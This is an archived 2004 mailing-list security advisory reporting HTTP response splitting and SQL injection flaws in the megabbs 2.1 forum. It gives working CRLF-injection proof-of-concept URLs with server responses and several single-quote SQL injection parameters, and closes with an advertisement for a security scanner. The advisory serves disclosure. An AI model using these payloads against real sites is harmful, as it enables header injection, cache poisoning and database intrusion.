| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <S695131AbUIZR44/20040926175656Z+226533@mail.yandex.ru> Date: Sun, 26 Sep 2004 21:56:44 +0400 From: "pigrelax" <pigrelax@...dex.ru> To: <full-disclosure@...ts.netsys.com> Cc: <bugtraq@...urityfocus.com>, <info@...soft.com> Subject: HTTP Response Splitting and SQL injection in megabbs forum URL: http://www.pd9soft.com Tested megabbs 2.1 1. HTTP Response Splitting http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0 d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20 text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat Result: <...> HTTP/1.1 302 Object moved Connection: close Date: Sun, 26 Sep 2004 14:14:02 GMT Server: Microsoft-IIS/6.0 Location: /megabbs/forums/forum-view.asp?fid= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 33 <html>Scanned by Maxpatrol</html> Content-Length: 290 Content-Type: text/html Expires: Sun, 26 Sep 2004 14:13:02 GMT Set-Cookie: guestID=309; path=/ Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ Cache-contro <...> 2. HTTP Response Splitting http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e %0d%0a&action=writenew&displaytype=flat Result: <...> HTTP/1.1 302 Object moved Connection: close Date: Sun, 26 Sep 2004 14:34:05 GMT Server: Microsoft-IIS/6.0 Location: /megabbs/forums/forum-view.asp?fid= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 33 <html>Scanned by Maxpatrol</html> Content-Length: 290 Content-Type: text/html Expires: Sun, 26 Sep 2004 14:33:05 GMT Set-Cookie: guestID=421; path=/ Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ Cache-contro <...> 3. More and more SQL injection: ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' ladder-log.asp?categoryid=1&filter=id&criteria=1' view-profile.asp?type=single&memberid=1' view-profile.asp?type=team&teamid=1' MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them. http://www.Maxpatrol.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists